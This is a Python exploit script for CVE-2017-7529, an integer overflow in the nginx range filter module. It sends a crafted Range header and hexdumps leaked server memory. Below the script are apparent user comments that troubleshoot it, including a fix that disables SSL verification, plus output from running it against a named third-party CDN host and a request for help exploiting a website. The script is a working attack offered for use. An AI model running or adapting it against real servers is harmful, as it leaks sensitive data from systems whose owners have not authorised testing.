CVE-2017-7529.py

#  Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable
# to integer overflow vulnerability in nginx range filter module resulting into leak
# of potentially sensitive information triggered by specially crafted request.
# * CVE-2017-7529
# - By @BlackViruScript / @Black#4544
import urllib.parse, requests, argparse
global colorama, termcolor
try:
    import colorama, termcolor
    colorama.init(autoreset=True)
except Exception as e:
    termcolor = colorama = None

colored = lambda text, color="", dark=False: termcolor.colored(text, color or "white", attrs=["dark"] if dark else []) if termcolor and colorama else text

class Exploit(requests.Session):
    buffer = set()
    def __init__(self, url):
        length = int(requests.get(url, verify=False).headers.get("Content-Length", 0)) + 623
        super().__init__()
        self.headers = {"Range": f"bytes=-{length},-9223372036854{776000 - length}"}
        self.target = urllib.parse.urlsplit(url)
    
    def check(self):
        try:
            response = self.get(self.target.geturl())
            return response.status_code == 206 and "Content-Range" in response.text
        except Exception as e:
            return False
    
    def hexdump(self, data):
        for b in range(0, len(data), 16):
            line = [char for char in data[b: b + 16]]
            print(colored(" -  {:04x}: {:48} {}".format(b, " ".join(f"{char:02x}" for char in line), "".join((chr(char) if 32 <= char <= 126 else ".") for char in line)), dark=True))
    
    def execute(self):
        vulnerable = self.check()
        print(colored(f"[{'+' if vulnerable else '-'}] {exploit.target.netloc} is Vulnerable: {str(vulnerable).upper()}", "white" if vulnerable else "yellow"))
        if vulnerable:
            data = b""
            while len(self.buffer) < 0x80:
                try:
                    response = self.get(self.target.geturl())
                    for line in response.content.split(b"\r\n"):
                        if line not in self.buffer:
                            data += line
                            self.buffer.add(line)
                except Exception as e:
                    print()
                    print(colored(f"[!] {type(e).__name__}:", "red"))
                    print(colored(f" -  {e}", "red", True))
                    break
                except KeyboardInterrupt:
                    print()
                    print(colored("[!] Keyboard Interrupted! (Ctrl+C Pressed)", "red"))
                    break
                print(colored(f"[i] Receiving Data [{len(data)} bytes] ..."), end = "\r")
            if data:
                print()
                self.hexdump(data)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(prog = "CVE-2017-7529",
                                     description = "Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.",
                                     epilog = "By: @BlackViruScript / @Black#4544")
    parser.add_argument("url", type = str, help = "Target URL.")
    parser.add_argument("-c", "--check", action = "store_true", help = "Only check if Target is vulnerable.")
    args = parser.parse_args()
    try:
        exploit = Exploit(args.url)
        if args.check:
            vulnerable = exploit.check()
            print(colored(f"[{'+' if vulnerable else '-'}] {exploit.target.netloc} is Vulnerable: {str(vulnerable).upper()}", "white" if vulnerable else "yellow"))
        else:
            try:
                exploit.execute()
            except Exception as e:
                print(colored(f"[!] {type(e).__name__}:", "red"))
                print(colored(f" -  {e}", "red", True))
    except KeyboardInterrupt:
        print(colored("[!] Keyboard Interrupted! (Ctrl+C Pressed)", "red"))
    except Exception as e:
        print(colored(f"[!] {urllib.parse.urlsplit(args.url).netloc}: {type(e).__name__}", "red"))

to execute do "python3 ("name of the exploitfile").py "URL" "

Error running this Script. How to fix it

File "test.py", line 21
self.headers = {"Range": f"bytes=-{length},-9223372036854{776000 - length}"}
^
SyntaxError: invalid syntax

You need to install python 3.6. This link helped me to fix the problem on Ubuntu 16.04.

http://ubuntuhandbook.org/index.php/2017/07/install-python-3-6-1-in-ubuntu-16-04-lts/

Any info if it is still working at nginx 1. 14 ? It seems to be working, returning source code of the webpage. Thx

I am getting ssl error.. reading the code to add ssl verification... Do you already have the ssl version?

File "test.py", line 83
print(colored(f"[!] {urllib.parse.urlsplit(args.url).netloc}: {type(e).name}", "red"))
^
IndentationError: expected an indented block

I am getting ssl error.. reading the code to add ssl verification... Do you already have the ssl version?

Did you implement a fix?
I just need it to ignore SSL,but accept https (Self signed) it doesn't even have to validate.

Cant be used with https targets

python3 CVE-2017-7529.py -c XXXXX.com/manager/html
[!] : MissingSchema

Everytime I run this script it gives me the above error.

[+] steamcdn-a.akamaihd.net is Vulnerable: TRUE
[i] Receiving Data [134 bytes] ...
[!] ConnectionError:

• HTTPSConnectionPool(host='steamcdn-a.akamaihd.net', port=443): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.VerifiedHTTPSConnection object at 0x7fa0ef76fdd8>: Failed to establish a new connection: [Errno -2] Name or service not known'))

• 0000: 2d 2d 42 46 32 31 43 33 42 43 33 36 38 35 42 43 --BF21C3BC3685BC

• 0010: 38 30 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 80Content-Type:

• 0020: 74 65 78 74 2f 68 74 6d 6c 43 6f 6e 74 65 6e 74 text/htmlContent

• 0030: 2d 52 61 6e 67 65 3a 20 62 79 74 65 73 20 30 2d -Range: bytes 0-

• 0040: 34 34 2f 34 35 3c 68 74 6d 6c 3e 0a 3c 68 65 61 44/45.<hea

• 0050: 64 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 d>..<body

• 0060: 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c >..</html

• 0070: 3e 0a 2d 2d 42 46 32 31 43 33 42 43 33 36 38 35 >.--BF21C3BC3685

$ python3 t.py https://google.com
[!] google.com: TypeError

help me plz

Not working

On nginx 1.10 it says not vulnerable

Hello bro ,
i have a vulnerable website..
please tell me how to exploit it..

For the SSL errors just change line 19 to this:

    length = int(requests.get(url, verify=False).headers.get("Content-Length", 0)) + 623

python3 CVE-2017-7529.py -c XXXXX.com/manager/html
[!] : MissingSchema

Everytime I run this script it gives me the above error.

You're missing http:// on the url, schema means https or http

I am getting ssl error.. reading the code to add ssl verification... Do you already have the ssl version?

Did you implement a fix?
I just need it to ignore SSL,but accept https (Self signed) it doesn't even have to validate.

inside it on line 19 change it from
length = int(requests.get(url).headers.get("Content-Length", 0)) + 623
to
length = int(requests.get(url, verify=False).headers.get("Content-Length", 0)) + 623
and it will run fine

thanks for this! grateful for the sharing of knowledge